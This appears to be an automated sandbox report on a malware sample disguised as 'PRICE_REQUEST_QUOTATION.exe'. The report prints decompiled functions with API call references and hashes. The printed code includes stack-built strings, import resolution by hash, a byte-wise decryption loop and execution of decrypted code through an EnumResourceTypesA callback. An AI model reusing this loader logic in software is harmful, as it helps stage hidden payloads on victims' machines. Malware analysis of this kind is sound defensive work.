                                        					_t11 = GetTickCount();
                                        					_t16 = 0x1a;
                                        					_a6 = _a6 + _t11 % _t16;
                                        					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                        					if(_t14 != 0) {
                                        						break;
                                        					}
                                        					if(_t19 != 0) {
                                        						continue;
                                        					}
                                        					 *_t20 =  *_t20 & 0x00000000;
                                        					return _t14;
                                        				}
                                        				return _t20;
                                        			}

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004058E0
                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-1639700786
                                        • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                        • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                        • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                        • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E7333A000() {
                                        				intOrPtr _v8;
                                        				signed int _v12;
                                        				void* _v16;
                                        				void* _v20;
                                        				short _v22;
                                        				short _v24;
                                        				short _v26;
                                        				short _v28;
                                        				short _v30;
                                        				short _v32;
                                        				short _v34;
                                        				short _v36;
                                        				short _v38;
                                        				short _v40;
                                        				short _v42;
                                        				char _v44;
                                        				short _v46;
                                        				short _v48;
                                        				short _v50;
                                        				short _v52;
                                        				short _v54;
                                        				short _v56;
                                        				short _v58;
                                        				short _v60;
                                        				short _v62;
                                        				short _v64;
                                        				short _v66;
                                        				short _v68;
                                        				short _v70;
                                        				short _v72;
                                        				short _v74;
                                        				char _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				long _v120;
                                        				short _v1160;
                                        				short _t82;
                                        				short _t83;
                                        				short _t84;
                                        				short _t85;
                                        				short _t86;
                                        				short _t87;
                                        				short _t88;
                                        				short _t89;
                                        				short _t90;
                                        				short _t91;
                                        				short _t92;
                                        				short _t107;
                                        				short _t108;
                                        				short _t109;
                                        				short _t110;
                                        				short _t111;
                                        				short _t112;
                                        				short _t113;
                                        				short _t114;
                                        				short _t115;
                                        				short _t116;
                                        				short _t117;
                                        				short _t118;
                                        				short _t119;
                                        				short _t120;
                                        				short _t121;
                                        				void* _t129;
                                        				signed int _t130;
                                        				void* _t131;
                                        				int _t133;
                                        				void* _t136;
                                        
                                        				// Wide string built on the stack one character at a time (_v44 .. _v22): L"Shlwapi.dll"
                                        				_t82 = 0x53;
                                        				_v44 = _t82;
                                        				_t83 = 0x68;
                                        				_v42 = _t83;
                                        				_t84 = 0x6c;
                                        				_v40 = _t84;
                                        				_t85 = 0x77;
                                        				_v38 = _t85;
                                        				_t86 = 0x61;
                                        				_v36 = _t86;
                                        				_t87 = 0x70;
                                        				_v34 = _t87;
                                        				_t88 = 0x69;
                                        				_v32 = _t88;
                                        				_t89 = 0x2e;
                                        				_v30 = _t89;
                                        				_t90 = 0x64;
                                        				_v28 = _t90;
                                        				_t91 = 0x6c;
                                        				_v26 = _t91;
                                        				_t92 = 0x6c;
                                        				_v24 = _t92;
                                        				_v22 = 0;
                                        				_v12 = _v12 & 0x00000000;
                                        				_v8 = E7333A6C7();
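                                        				// E7333A776 takes a module base and a 32-bit constant, and its results (_v84, _v88, _v96) are later called as functions:
                                        				// this is consistent with imports being looked up by hash instead of by name
                                        				_v84 = E7333A776(_v8, 0x7fc01dae);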
                                        				_v116 = E7333A776(_v8, 0xff7f721a);
                                        				_v80 = E7333A776(_v8, 0x7fd6a366);
                                        				_v88 = E7333A776(_v80( &_v44), 0x7f5a653a);
                                        				_v112 = E7333A776(_v8, 0x7f91a078);
                                        				_v92 = E7333A776(_v8, 0x7fe63623);
                                        				_v96 = E7333A776(_v8, 0x7fbd727f);
                                        				_v100 = E7333A776(_v8, 0x7fb47add);
                                        				_v104 = E7333A776(_v8, 0x7fe7f840);
                                        				_t146 = _v8;
                                        				_v108 = E7333A776(_v8, 0x7fe1f1fb);
                                        				// Wide string built on the stack one character at a time (_v76 .. _v46): L"4gyujazywsbdaoe"
                                        				_t107 = 0x34;
                                        				_v76 = _t107;
                                        				_t108 = 0x67;
                                        				_v74 = _t108;
                                        				_t109 = 0x79;
                                        				_v72 = _t109;
                                        				_t110 = 0x75;
                                        				_v70 = _t110;
                                        				_t111 = 0x6a;
                                        				_v68 = _t111;
                                        				_t112 = 0x61;
                                        				_v66 = _t112;
                                        				_t113 = 0x7a;
                                        				_v64 = _t113;
                                        				_t114 = 0x79;
                                        				_v62 = _t114;
                                        				_t115 = 0x77;
                                        				_v60 = _t115;
                                        				_t116 = 0x73;
                                        				_v58 = _t116;
                                        				_t117 = 0x62;
                                        				_v56 = _t117;
                                        				_t118 = 0x64;
                                        				_v54 = _t118;
                                        				_t119 = 0x61;
                                        				_v52 = _t119;
                                        				_t120 = 0x6f;
                                        				_v50 = _t120;
                                        				_t121 = 0x65;
                                        				_v48 = _t121;
                                        				_v46 = 0;
                                        				_v84(0x103,  &_v1160);
                                        				_v88( &_v1160,  &_v76);
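                                        				// 0x80000000 = GENERIC_READ, 7 = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, 3 = OPEN_EXISTING, 0x80 = FILE_ATTRIBUTE_NORMAL
                                        				_t129 = CreateFileW( &_v1160, 0x80000000, 7, 0, 3, 0x80, 0);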
                                        				_v20 = _t129;
                                        				if(_v20 != 0xffffffff) {
                                        					_t130 = _v96(_v20, 0);
                                        					_v12 = _t130;
                                        					if(_v12 != 0xffffffff) {
                                        						_t131 = VirtualAlloc(0, _v12, 0x3000, 4);
                                        						_v16 = _t131;
                                        						if(_v16 != 0) {
                                        							_t133 = ReadFile(_v20, _v16, _v12,  &_v120, 0);
                                        							if(_t133 != 0) {
                                        								FindCloseChangeNotification(_v20);
                                        								_v16 = E7333AA08(_t146, _v16, _v12);
                                        								_t136 = E7333ACAD(_v16); // executed
                                        								ExitProcess(0);
                                        							}
                                        							return _t133;
                                        						}
                                        						return _t131;
                                        					}
                                        					return _t130;
                                        				}
                                        				return _t129;
                                        			}
                                        0x7333a93a
                                        0x7333a93b
                                        0x7333a941
                                        0x7333a942
                                        0x7333a948
                                        0x7333a949
                                        0x7333a94f
                                        0x7333a950
                                        0x7333a956
                                        0x7333a966
                                        0x7333a974
                                        0x7333a990
                                        0x7333a993
                                        0x7333a99a
                                        0x7333a9a3
                                        0x7333a9a6
                                        0x7333a9ad
                                        0x7333a9bd
                                        0x7333a9c0
                                        0x7333a9c7
                                        0x7333a9da
                                        0x7333a9df
                                        0x7333a9e6
                                        0x7333a9f4
                                        0x7333a9fa
                                        0x7333aa01
                                        0x7333aa01
                                        0x00000000
                                        0x7333a9df
                                        0x00000000
                                        0x7333a9c7
                                        0x00000000
                                        0x7333a9ad
                                        0x00000000

                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7333A990
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: eda658c0f1fa01e9053b95094e5242536d018f1f8a696e3ea468c2c5bbec2169
                                        • Instruction ID: 7293058599f287f9f86dd9590430e4169df19742766948594a6e10f2f0a3a6f5
                                        • Opcode Fuzzy Hash: eda658c0f1fa01e9053b95094e5242536d018f1f8a696e3ea468c2c5bbec2169
                                        • Instruction Fuzzy Hash: 37712635E50348EBEB60CBE4E951BEDB7B5AF48710F20941AF618FA2E0E7750A41DB05
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E00401F84(void* __ebx, void* __eflags) {
                                        				struct HINSTANCE__* _t18;
                                        				struct HINSTANCE__* _t26;
                                        				void* _t27;
                                        				struct HINSTANCE__* _t30;
                                        				CHAR* _t32;
                                        				intOrPtr* _t33;
                                        				void* _t34;
                                        
                                        				_t27 = __ebx;
                                        				asm("sbb eax, 0x42ecd8");
                                        				 *(_t34 - 4) = 1;
                                        				if(__eflags < 0) {
                                        					_push(0xffffffe7);
                                        					L15:
                                        					E00401423();
                                        					L16:
                                        					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
                                        					return 0;
                                        				}
                                        				_t32 = E00402A29(0xfffffff0);
                                        				 *(_t34 + 8) = E00402A29(1);
                                        				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                        					L3:
                                        					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                        					_t30 = _t18;
                                        					if(_t30 == _t27) {
                                        						_push(0xfffffff6);
                                        						goto L15;
                                        					}
                                        					L4:
                                        					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                        					if(_t33 == _t27) {
                                        						E00404EB3(0xfffffff7,  *(_t34 + 8));
                                        					} else {
                                        						 *(_t34 - 4) = _t27;
                                        						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                        							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
                                        						} else {
                                        							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                        							if( *_t33() != 0) {
                                        								 *(_t34 - 4) = 1;
                                        							}
                                        						}
                                        					}
                                        					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
                                        						FreeLibrary(_t30);
                                        					}
                                        					goto L16;
                                        				}
                                        				_t26 = GetModuleHandleA(_t32); // executed
                                        				_t30 = _t26;
                                        				if(_t30 != __ebx) {
                                        					goto L4;
                                        				}
                                        				goto L3;
                                        			}

                                        APIs
                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,00419301,7519EA30), ref: 00404F0F
                                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                        • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                        • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                        • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E004015B3(char __ebx, void* __eflags) {
                                        				void* _t13;
                                        				int _t19;
                                        				char _t21;
                                        				void* _t22;
                                        				char _t23;
                                        				signed char _t24;
                                        				char _t26;
                                        				CHAR* _t28;
                                        				char* _t32;
                                        				void* _t33;
                                        
                                        				_t26 = __ebx;
                                        				_t28 = E00402A29(0xfffffff0);
                                        				_t13 = E0040574E(_t28);
                                        				_t30 = _t13;
                                        				if(_t13 != __ebx) {
                                        					do {
                                        						_t32 = E004056E5(_t30, 0x5c);
                                        						_t21 =  *_t32;
                                        						 *_t32 = _t26;
                                        						 *((char*)(_t33 + 0xb)) = _t21;
                                        						if(_t21 != _t26) {
                                        							L5:
                                        							_t22 = E004053F2(_t28);
                                        						} else {
                                        							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                        							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
                                        								goto L5;
                                        							} else {
                                        								_t22 = E00405375(_t28); // executed
                                        							}
                                        						}
                                        						if(_t22 != _t26) {
                                        							if(_t22 != 0xb7) {
                                        								L9:
                                        								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                        							} else {
                                        								_t24 = GetFileAttributesA(_t28); // executed
                                        								if((_t24 & 0x00000010) == 0) {
                                        									goto L9;
                                        								}
                                        							}
                                        						}
                                        						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                        						 *_t32 = _t23;
                                        						_t30 = _t32 + 1;
                                        					} while (_t23 != _t26);
                                        				}
                                        				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                        					_push(0xfffffff5);
                                        					E00401423();
                                        				} else {
                                        					E00401423(0xffffffe6);
                                        					E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
                                        					_t19 = SetCurrentDirectoryA(_t28); // executed
                                        					if(_t19 == 0) {
                                        						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                        					}
                                        				}
                                        				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
                                        				return 0;
                                        			}

                                        APIs
                                          • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                          • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 1892508949-1943935188
                                        • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                        • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                        • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                        • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E73337500(void* __ecx) {
                                        				signed int _v5;
                                        				signed int _v12;
                                        				struct HINSTANCE__* _v16;
                                        				void* _t116;
                                        				int _t119;
                                        				void* _t151;
                                        
                                        				_t151 = __ecx;
                                        				_v16 = 0;
                                        				_t116 = VirtualAlloc(0, 0xbebc200, 0x3000, 4); // executed
                                        				_v16 = _t116;
                                        				if(_v16 != 0) {
                                        					E73337770(_t151, _v16, 0xbebc200);
                                        					_v12 = 0;
                                        					_v12 = 0;
                                        					while(_v12 < 0x129f) {
                                        						_t11 = E7333A000 + _v12; // 0x2c702500
                                        						_v5 =  *_t11;
                                        						_v5 =  !(_v5 & 0x000000ff);
                                        						_v5 = (_v5 & 0x000000ff) + _v12;
                                        						_v5 = _v5 & 0x000000ff ^ _v12;
                                        						_v5 =  !(_v5 & 0x000000ff);
                                        						_v5 = (_v5 & 0x000000ff) + _v12;
                                        						_v5 =  ~(_v5 & 0x000000ff);
                                        						_v5 = (_v5 & 0x000000ff) + _v12;
                                        						_v5 = _v5 & 0x000000ff ^ _v12;
                                        						_v5 =  ~(_v5 & 0x000000ff);
                                        						_v5 = _v5 & 0x000000ff ^ _v12;
                                        						_v5 =  !(_v5 & 0x000000ff);
                                        						_v5 = (_v5 & 0x000000ff) - _v12;
                                        						_v5 = _v5 & 0x000000ff ^ _v12;
                                        						_v5 = (_v5 & 0x000000ff) - _v12;
                                        						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
                                        						_v5 =  ~(_v5 & 0x000000ff);
                                        						_v5 = (_v5 & 0x000000ff) + _v12;
                                        						_v5 = _v5 & 0x000000ff ^ _v12;
                                        						_v5 = (_v5 & 0x000000ff) + _v12;
                                        						_v5 =  ~(_v5 & 0x000000ff);
                                        						_v5 = _v5 & 0x000000ff ^ _v12;
                                        						_v5 = (_v5 & 0x000000ff) - 0xb2;
                                        						_v5 = _v5 & 0x000000ff ^ _v12;
                                        						_v5 = (_v5 & 0x000000ff) + 0x5a;
                                        						_v5 =  ~(_v5 & 0x000000ff);
                                        						_v5 =  !(_v5 & 0x000000ff);
                                        						_v5 =  ~(_v5 & 0x000000ff);
                                        						_v5 = _v5 & 0x000000ff ^ _v12;
                                        						_v5 =  !(_v5 & 0x000000ff);
                                        						_v5 = (_v5 & 0x000000ff) - _v12;
                                        						_v5 = _v5 & 0x000000ff ^ 0x000000d5;
                                        						_v5 = (_v5 & 0x000000ff) + _v12;
                                        						_v5 =  ~(_v5 & 0x000000ff);
                                        						_v5 = (_v5 & 0x000000ff) - _v12;
                                        						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
                                        						_v5 = _v5 & 0x000000ff ^ 0x0000004e;
                                        						_v5 =  ~(_v5 & 0x000000ff);
                                        						_v5 =  !(_v5 & 0x000000ff);
                                        						_v5 = (_v5 & 0x000000ff) - 0x7e;
                                        						_v5 =  !(_v5 & 0x000000ff);
                                        						 *((char*)(E7333A000 + _v12)) = _v5;
                                        						_v12 = _v12 + 1;
                                        					}
                                        					_t119 = EnumResourceTypesA(0, E7333A000, 0); // executed
                                        					return _t119;
                                        				}
                                        				return _t116;
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,0BEBC200,00003000,00000004), ref: 7333751B
                                        • EnumResourceTypesA.KERNEL32 ref: 73337723
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: AllocEnumResourceTypesVirtual
                                        • String ID:
                                        • API String ID: 1791965044-0
                                        • Opcode ID: cae52a40d90159ea98e5f9178861ae7aba8192c4be010e1d6b39f00b015be915
                                        • Instruction ID: d28db088a579ca826fff4a08610aadf7d9380ab954838a8c9eb6e85dcf67b67a
                                        • Opcode Fuzzy Hash: cae52a40d90159ea98e5f9178861ae7aba8192c4be010e1d6b39f00b015be915
                                        • Instruction Fuzzy Hash: AA717824C4D3DCA9DF16C7F984607ECBFB55E6B102F0881CAE4D566286C57A138EDB21
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E00401389(signed int _a4) {
                                        				intOrPtr* _t6;
                                        				void* _t8;
                                        				void* _t10;
                                        				signed int _t11;
                                        				void* _t12;
                                        				intOrPtr _t15;
                                        				signed int _t16;
                                        				signed int _t17;
                                        				void* _t18;
                                        
                                        				_t17 = _a4;
                                        				while(_t17 >= 0) {
                                        					_t15 =  *0x42ec50; // 0x6c143c
                                        					_t6 = _t17 * 0x1c + _t15;
                                        					if( *_t6 == 1) {
                                        						break;
                                        					}
                                        					_push(_t6); // executed
                                        					_t8 = E00401434(); // executed
                                        					if(_t8 == 0x7fffffff) {
                                        						return 0x7fffffff;
                                        					}
                                        					_t10 = E0040136D(_t8);
                                        					if(_t10 != 0) {
                                        						_t11 = _t10 - 1;
                                        						_t16 = _t17;
                                        						_t17 = _t11;
                                        						_t12 = _t11 - _t16;
                                        					} else {
                                        						_t12 = _t10 + 1;
                                        						_t17 = _t17 + 1;
                                        					}
                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                        						 *0x42e40c =  *0x42e40c + _t12;
                                        						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
                                        					}
                                        				}
                                        				return 0;
                                        			}













                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageA.USER32 ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                        • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                        • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                        • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405F57(signed int _a4) {
                                        				struct HINSTANCE__* _t5;
                                        				signed int _t10;
                                        
                                        				_t10 = _a4 << 3;
                                        				_t8 =  *(_t10 + 0x409208);
                                        				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
                                        				if(_t5 != 0) {
                                        					L2:
                                        					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
                                        				}
                                        				_t5 = E00405EE9(_t8); // executed
                                        				if(_t5 == 0) {
                                        					return 0;
                                        				}
                                        				goto L2;
                                        			}






                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                          • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                          • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                          • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                        • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                        • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                        • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E0040589E(CHAR* _a4, long _a8, long _a12) {
                                        				signed int _t5;
                                        				void* _t6;
                                        
                                        				_t5 = GetFileAttributesA(_a4); // executed
                                        				asm("sbb ecx, ecx");
                                        				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                        				return _t6;
                                        			}






                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 004058A2
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                        • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                        • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                        • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040587F(CHAR* _a4) {
                                        				signed char _t3;
                                        
